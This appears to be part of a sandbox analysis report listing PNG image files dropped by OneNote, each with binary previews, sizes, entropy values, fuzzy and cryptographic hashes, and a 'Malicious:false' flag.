                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
